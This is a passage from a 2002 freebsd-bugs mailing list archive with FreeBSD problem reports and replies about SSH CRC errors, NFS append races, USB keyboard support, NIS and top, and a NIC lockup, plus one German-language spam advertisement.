with ESMTP id g6VJpxJU034713; Wed, 31 Jul 2002 12:51:59 -0700 (PDT) (envelope-from silby@freefall.freebsd.org) Received: (from silby@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VJpxCd034709; Wed, 31 Jul 2002 12:51:59 -0700 (PDT) Date: Wed, 31 Jul 2002 12:51:59 -0700 (PDT) From: Mike Silbersack Message-Id: <200207311951.g6VJpxCd034709@freefall.freebsd.org> To: silby@FreeBSD.org, freebsd-bugs@FreeBSD.org, silby@FreeBSD.org Subject: Re: i386/41138: vr0 locks up on one hub, OK on another Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: vr0 locks up on one hub, OK on another Responsible-Changed-From-To: freebsd-bugs->silby Responsible-Changed-By: silby Responsible-Changed-When: Wed Jul 31 12:51:26 PDT 2002 Responsible-Changed-Why: I'll take custody of this vr PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=41138 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 14:20: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 817F837B400 for ; Wed, 31 Jul 2002 14:20:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2E07C43E4A for ; Wed, 31 Jul 2002 14:20:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VLK3JU051644 for ; Wed, 31 Jul 2002 14:20:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VLK3iH051641; Wed, 31 Jul 2002 14:20:03 -0700 (PDT) Date: Wed, 31 Jul 2002 14:20:03 -0700 (PDT) Message-Id: <200207312120.g6VLK3iH051641@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: AMAKAWA Shuhei Subject: Re: bin/7434: Misspelling in fortune info file Reply-To: AMAKAWA Shuhei Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/7434; it has been noted by GNATS. From: AMAKAWA Shuhei To: freebsd-gnats-submit@FreeBSD.org, pechter@shell.monmouth.com, thepish@freebsd.org Cc: freebsd-doc@FreeBSD.org Subject: Re: bin/7434: Misspelling in fortune info file Date: Wed, 31 Jul 2002 22:19:13 +0100 Hi. Why was bin/7434 closed? The patch was applied only to RELENG_2_2. It should be applied to the main trunk as well. Thanks. -- Shuhei To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 14:28:51 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2899B37B406 for ; Wed, 31 Jul 2002 14:28:35 -0700 (PDT) Received: from vite.ch (mail.vite.ch [212.147.17.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8508D43E3B for ; Wed, 31 Jul 2002 14:28:33 -0700 (PDT) (envelope-from mailing@vite.ch) Received: {(helo=hote) }}by vite.ch with esmtp (Exim 3.35 #1) id 17a0AH-0000fW-05 for freebsd-bugs@FreeBSD.ORG; Wed, 31 Jul 2002 22:33:49 +0200 Message-ID: <4188-220027331203513340@hote> X-Priority: 3 Reply-To: "www.notreshop.com" X-MSMail-Priority: Normal Organization: NotreShop.com From: "www.notreshop.com" To: "freebsd-bugs@FreeBSD.ORG" Subject: Das Angebot von notreshop.com Date: Wed, 31 Jul 2002 22:35:13 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_84815C5ABAF209EF376268C8" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_84815C5ABAF209EF376268C8 Content-type: text/plain; charset=iso-8859-15 Content-Transfer-Encoding: quoted-printable Informationsschreiben der notreshop=2Ecom Spezialofferte dieser Woche CD-ROM Guten Tag, Interessiert Sie dieses CD-ROM ? Klicken Sie bitte auf den Link, der sich=20= unter der Produktbeschreibung befindet=2E ---------------------------------------------------------------- SPEAK NATURALLY=A0 (CHF 19=2E90) anstelle von 69=2E- http://www=2Enotreshop=2Ecom/Deutsch/speak=2Ehtm ---------------------------------------------------------------- Speak Naturally - das revolution=E4re Programm aus der Welt der Spracherke= nnung inklusive Headset (Kopfh=F6rer-, Mikrofon- Kombination) zu einem abs= oluten Superpreis ! =20 Mit dieser von Dragon Systems Inc=2E entwickelten Spracherkennungssoftware= l=E4sst sich nach kurzer Einarbeitungszeit eine Diktiergeschwindigkeit vo= n 160 W=F6rter pro Minute erzielen=2E Die Geschwindigkeit kann sogar noch gesteigert werden, da sich das Erkennu= ngssystem dynamisch an Ihrer Stimme orientiert, d=2Eh=2E mit=20 jedem Diktat schneller wird=2E Die hohe Pr=E4zision der Spracherkennung l=E4= sst nur sehr wenige Fehler zu, sie liegt bei 97% und h=F6her=2E Mit Speak Naturally k=F6nnen Sie Ihre Berichte, E-Mails, Angebote, Tabelle= n, Briefe, Texte etc=2E einfach in den PC diktieren=2E Das basierende W=F6= rterbuch enth=E4lt 280'000 W=F6rter=2E Mit dem "Vocabulary Builder" k=F6nnen Sie jederzeit neue W=F6rter aufnehme= n=2E SOLANGE VORRAT ---------------------------------------------------------------- http://www=2Enotreshop=2Ecom/Deutsch/speak=2Ehtm ---------------------------------------------------------------- Lieferung gegen Rechnung zuz=FCglich Versandspesen CHF 5=2E- ; zahlbar inn= ert 30 Tagen R=FCckgaberecht : 10 Tage=2E Bis bald f=FCr weitere Geschenki= deen=2E Falls Sie keine weiteren Informationen per E-Mail erhalten m=F6chten, so k= licken Sie bitte auf den untenstehenden Link :=20 http://www=2Enotreshop=2Ecom/Deutsch/abonnement=2Ehtm Mit freundlichen Gr=FCssen, Ihr notreshop=2Ecom Team=2E=20 ------=_NextPart_84815C5ABAF209EF376268C8 Content-Type: text/html; charset=iso-8859-15 Content-Transfer-Encoding: quoted-printable Informationsschreiben der notreshop=2Ecom =20

Informationsschreiben= der notreshop=2Ecom
Spezialofferte dieser Woche CD-ROM

Guten=20 Tag,
Interessiert Sie dieses=20 CD-ROM ? Klicken Sie bitte auf den Link, der sich unter der=20 Produktbeschreibung befindet=2E

=20 SPEAK=20 NATURALLY  (CHF 19=2E90) anstelle von 69=2E-

Speak Naturally - das revolution=E4re Programm aus der Welt der=20 Spracherkennung inklusive Headset (Kopfh=F6rer-, Mikrofon- Kombination) zu= einem=20 absoluten Superpreis! Mit dieser von Dragon Systems Inc=2E entwickelten=20= Spracherkennungssoftware l=E4sst sich nach kurzer Einarbeitungszeit eine=20= Diktiergeschwindigkeit von 160 W=F6rter pro Minute erzielen=2E Die Geschwi= ndigkeit=20 kann sogar noch gesteigert werden, da sich das Erkennungssystem dynamisch = an=20 Ihrer Stimme orientiert, d=2Eh=2E mit jedem Diktat schneller wird=2E Die h= ohe=20 Pr=E4zision der Spracherkennung l=E4sst nur sehr wenige Fehler zu, sie lie= gt bei 97%=20 und h=F6her=2E Mit Speak Naturally k=F6nnen Sie Ihre Berichte, E-Mails, An= gebote,=20 Tabellen, Briefe, Texte etc=2E einfach in den PC diktieren=2E Das basieren= de=20 W=F6rterbuch enth=E4lt 280'000 W=F6rter=2E Mit dem "Vocabulary Builde= r" k=F6nnen Sie=20 jederzeit neue W=F6rter aufnehmen=2E

SOLANGE VORRAT

BESTELLUNG

Lieferung gegen= Rechnung=20 zuz=FCglich Versandspesen CHF 5=2E- ; zahlbar innert 30=20 Tagen
R=FCckgaberecht : 10 Tage=2E Bis bald f=FCr weitere Geschen= kideen=2E

Falls Sie keine weiteren=20 Informationen per E-Mail erhalten m=F6chten, so klicken Sie bitte au= f den=20 untenstehenden Link:

Ab= onnieren /=20 Aufl=F6sung

Mit freundlichen Gr=FCssen, Ihr notreshop=2Ecom Team=2E
------=_NextPart_84815C5ABAF209EF376268C8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 14:30: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 73D9237B405 for ; Wed, 31 Jul 2002 14:30:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8F77543E67 for ; Wed, 31 Jul 2002 14:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VLU1JU052614 for ; Wed, 31 Jul 2002 14:30:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VLU12B052613; Wed, 31 Jul 2002 14:30:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CF32F37B400 for ; Wed, 31 Jul 2002 14:20:59 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9405543E31 for ; Wed, 31 Jul 2002 14:20:59 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VLKwOT006863 for ; Wed, 31 Jul 2002 14:20:58 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6VLKwNW006862; Wed, 31 Jul 2002 14:20:58 -0700 (PDT) Message-Id: <200207312120.g6VLKwNW006862@www.freebsd.org> Date: Wed, 31 Jul 2002 14:20:58 -0700 (PDT) From: Ryan To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/41212: Corrupted CRC received at random times when in SSH session with system Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41212 >Category: i386 >Synopsis: Corrupted CRC received at random times when in SSH session with system >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jul 31 14:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Ryan >Release: 4.5 >Organization: infrax internet technologies >Environment: FreeBSD edge.crimsonblur.net 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Tue Apr 2 20:21:24 GMT 2002 digital@edge.crimsonblur.net:/usr/src/sys/compile/CUSTOM i386 >Description: At random times, usually when a larger amount of data is being transmitted from the system to the client connected via SSH, a message "Incorrect CRC received on packet" (or similar) appears when in several environments, including Red Hat and Windows >How-To-Repeat: appens at random times, when large amounts of text is going from the (FreeBSD) server to the client via SSH. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 15: 0:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1B27537B400 for ; Wed, 31 Jul 2002 15:00:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2501C43E67 for ; Wed, 31 Jul 2002 15:00:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VM06JU055456 for ; Wed, 31 Jul 2002 15:00:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VM06gO055455; Wed, 31 Jul 2002 15:00:06 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3FDE737B400 for ; Wed, 31 Jul 2002 14:52:30 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0191843E3B for ; Wed, 31 Jul 2002 14:52:30 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VLqTOT009316 for ; Wed, 31 Jul 2002 14:52:29 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6VLqTCp009315; Wed, 31 Jul 2002 14:52:29 -0700 (PDT) Message-Id: <200207312152.g6VLqTCp009315@www.freebsd.org> Date: Wed, 31 Jul 2002 14:52:29 -0700 (PDT) From: Stefan Schwarzer To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41213: top(1) blocks if NIS-related entries in passwd(5) are in a certain order Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41213 >Category: misc >Synopsis: top(1) blocks if NIS-related entries in passwd(5) are in a certain order >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jul 31 15:00:06 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Stefan Schwarzer >Release: Release 4.6 >Organization: TU Clausthal >Environment: FreeBSD purpurea.rz.tu-clausthal.de 4.6-RELEASE-p1 FreeBSD 4.6-RELEASE-p1 #4: Tue Jul 16 19:01:33 CEST 2002 root@purpurea.rz.tu-clausthal.de:/usr/obj/usr/src/sys/PURPUREA i386 >Description: see http://docs.freebsd.org/cgi/getmsg.cgi?fetch=153740+0+archive/2002/freebsd-questions/20020728.freebsd-questions and http://docs.freebsd.org/cgi/getmsg.cgi?fetch=639426+0+archive/2002/freebsd-questions/20020728.freebsd-questions >How-To-Repeat: I don't know if the problem also occurs on other machines. At least, it was reproducible on the machine in question, that the problem went away when the NIS netgroup entry was placed after all the NIS accounts (see URLs under "Full Description"). >Fix: I know only a workaround, see the URLs. I do not know, though, whether this workaround is feasible in any case. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 15:40:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3D9F837B400 for ; Wed, 31 Jul 2002 15:40:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id B81EF43E6A for ; Wed, 31 Jul 2002 15:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VMe2JU063208 for ; Wed, 31 Jul 2002 15:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VMe2ut063207; Wed, 31 Jul 2002 15:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8EFA737B445 for ; Wed, 31 Jul 2002 15:31:53 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3DCD243E4A for ; Wed, 31 Jul 2002 15:31:53 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VMVrOT014044 for ; Wed, 31 Jul 2002 15:31:53 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6VMVrHB014043; Wed, 31 Jul 2002 15:31:53 -0700 (PDT) Message-Id: <200207312231.g6VMVrHB014043@www.freebsd.org> Date: Wed, 31 Jul 2002 15:31:53 -0700 (PDT) From: Ed Yu To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/41214: boot loader cannot use USB Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41214 >Category: kern >Synopsis: boot loader cannot use USB >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jul 31 15:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Ed Yu >Release: 4.6 >Organization: >Environment: FreeBSD matrix.corp.terraspring.com 4.6-RELEASE FreeBSD 4.6-RELEASE #4: Tue Jul 23 22:37:11 PDT 2002 whoever@whatever.com:/usr/src/sys/compile/MATRIX i386 >Description: The boot loader will only allow selection of multiple OS using AT keyboard until the USB driver is fully loaded much later. Since more and more people are using USB keyboards only, it's essential that some kind of simple (keyboard only) USB support be built into the boot loader. >How-To-Repeat: Just reboot the system >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 15:40:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5FBDB37B401 for ; Wed, 31 Jul 2002 15:40:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 39D4F43E70 for ; Wed, 31 Jul 2002 15:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VMe2JU063222 for ; Wed, 31 Jul 2002 15:40:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VMe2eB063221; Wed, 31 Jul 2002 15:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BCEEF37B405 for ; Wed, 31 Jul 2002 15:38:39 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8172543E4A for ; Wed, 31 Jul 2002 15:38:39 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VMcdOT014652 for ; Wed, 31 Jul 2002 15:38:39 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6VMcdgf014651; Wed, 31 Jul 2002 15:38:39 -0700 (PDT) Message-Id: <200207312238.g6VMcdgf014651@www.freebsd.org> Date: Wed, 31 Jul 2002 15:38:39 -0700 (PDT) From: Ed Yu To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41215: console revert back to kbd0 (AT) after KVM switches back to FreeBSD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41215 >Category: misc >Synopsis: console revert back to kbd0 (AT) after KVM switches back to FreeBSD >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jul 31 15:40:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Ed Yu >Release: 4.6 >Organization: >Environment: FreeBSD matrix.corp.terraspring.com 4.6-RELEASE FreeBSD 4.6-RELEASE #4: Tue Jul 23 22:37:11 PDT 2002 whoever@whatever.com:/usr/src/sys/compile/MATRIX i386 >Description: When using a KVM switch, after switch out of FreeBSD and switching back, the console reselects the ps/2 keyboard as the default keyboard even though previously kbdcontrol was run to select the usb keyboard as the default. I'll be better if both can be used at the same time or even if it just retains the USB keyboard as the default. >How-To-Repeat: Using a KVM, switch out of FreeBSD and back. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 16:40: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AA87037B405 for ; Wed, 31 Jul 2002 16:40:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 04E0A43E65 for ; Wed, 31 Jul 2002 16:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VNe1JU072130 for ; Wed, 31 Jul 2002 16:40:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VNe1sO072128; Wed, 31 Jul 2002 16:40:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C836437B400 for ; Wed, 31 Jul 2002 16:33:20 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8EAFA43E3B for ; Wed, 31 Jul 2002 16:33:20 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VNXKOT018089 for ; Wed, 31 Jul 2002 16:33:20 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6VNXKXm018088; Wed, 31 Jul 2002 16:33:20 -0700 (PDT) Message-Id: <200207312333.g6VNXKXm018088@www.freebsd.org> Date: Wed, 31 Jul 2002 16:33:20 -0700 (PDT) From: Yury Izrailevsky To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/41216: Get "NFS append race" error Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41216 >Category: kern >Synopsis: Get "NFS append race" error >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jul 31 16:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Yury Izrailevsky >Release: FreeBSD 4.5 Stable >Organization: >Environment: 4.5-STABLE FreeBSD i386 >Description: Console and /var/log/messages gets flooded with this message: /kernel-4.5-generic: NFS append race @3e1c00:512 /kernel-4.5-generic: NFS append race @3e1c00:512 /kernel-4.5-generic: NFS append race @3e3a00:1024 /kernel-4.5-generic: NFS append race @3e3a00:1024 /kernel-4.5-generic: NFS append race @3e5800:1536 /kernel-4.5-generic: NFS append race @3e5800:1536 >How-To-Repeat: Multi-thread application that appends and reads from ultiple files. This error apparently gets triggered in /usr/src/sys/nfs/nfs_bio.c, line 967. Comments in the source code indicate that the race condition "might occur XXX". Is there a fix to this? >Fix: Looking for one. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 17: 0:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9625237B400 for ; Wed, 31 Jul 2002 17:00:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 56D0E43E5E for ; Wed, 31 Jul 2002 17:00:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g71006JU073754 for ; Wed, 31 Jul 2002 17:00:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g71006S2073753; Wed, 31 Jul 2002 17:00:06 -0700 (PDT) Date: Wed, 31 Jul 2002 17:00:06 -0700 (PDT) Message-Id: <200208010000.g71006S2073753@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Gregory Bond Subject: Re: i386/41212: Corrupted CRC received at random times when in SSH session with system Reply-To: Gregory Bond Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/41212; it has been noted by GNATS. From: Gregory Bond To: Ryan Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/41212: Corrupted CRC received at random times when in SSH session with system Date: Thu, 01 Aug 2002 09:59:06 +1000 > At random times, usually when a larger amount of data is being transmit > ted from the system to the client connected via SSH, a message "Incorrect CRC > received on packet" (or similar) appears when in several environments, inclu > ding Red Hat and Windows Have you compiled your system or kernel with optimization levels other than "-O"? This has been known to cause problems in things like crypto and checksum code, and is not supported. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Aug 1 1:50: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 83DF837B400 for ; Thu, 1 Aug 2002 01:50:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E778143E65 for ; Thu, 1 Aug 2002 01:50:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g718o3JU057825 for ; Thu, 1 Aug 2002 01:50:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g718o3uR057823; Thu, 1 Aug 2002 01:50:03 -0700 (PDT) Date: Thu, 1 Aug 2002 01:50:03 -0700 (PDT) Message-Id: <200208010850.g718o3uR057823@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Maxim Konovalov Subject: Re: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf (fwd) Reply-To: Maxim Konovalov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41194; it has been noted by GNATS. From: Maxim Konovalov To: bug-followup@FreeBSD.org Cc: Subject: Re: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf (fwd) Date: Thu, 1 Aug 2002 12:45:33 +0400 (MSD) Adding to the audit trail. -- Maxim Konovalov, maxim@FreeBSD.org ---------- Forwarded message ---------- Date: Thu, 01 Aug 2002 09:10:36 +0100 From: James Vella To: Maxim Konovalov Subject: Re: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf resolved:-) apologies for my ignorance,as you can tell i'm still a novice.give my (this dumb user) best to all you guys,and continue your very excellect work cheers & rgds james To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From 